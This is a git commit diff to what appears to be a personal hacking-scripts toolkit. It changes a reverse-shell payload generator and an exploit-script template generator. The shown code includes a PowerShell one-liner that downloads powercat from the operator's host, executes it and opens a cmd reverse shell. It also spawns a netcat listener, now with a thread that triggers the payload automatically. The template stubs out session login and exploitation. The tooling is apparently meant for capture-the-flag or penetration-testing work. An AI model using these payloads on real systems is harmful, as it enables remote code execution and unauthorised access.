This commit is contained in:
Roman Hergenreder 2021-06-11 12:44:35 +02:00
parent 29d5f63c58
commit 1891efe2e4
2 changed files with 16 additions and 7 deletions

@ -4,6 +4,8 @@ import socket
import sys
import pty
import util
import time
import threading
def generatePayload(type, local_address, port):
@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
def triggerShell(func, port):
def _wait_and_exec():
time.sleep(1.5)
func()
threading.Thread(target=_wait_and_exec).start()
pty.spawn(["nc", "-lvvp", str(port)])

@ -5,21 +5,23 @@ import sys
def generateTemplate(baseUrl):
template = """#!/usr/bin/env python
import requests
import base64
import sys
import json
import base64
import requests
from bs4 import BeautifulSoup
from hackingscripts import util, fileserver
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BASE_URL = "%s"
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
def login(username, password):
# Template method to create a session
session = requests.Session()
post_data = { "username": username, "password": password }
res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
print("Login failed")
exit()
@ -29,6 +31,7 @@ def exploit(session, payload):
# Template method to exploit an endpoint
pass
if __name__ == "__main__":
session = login()
exploit(session, "id")
""" % baseUrl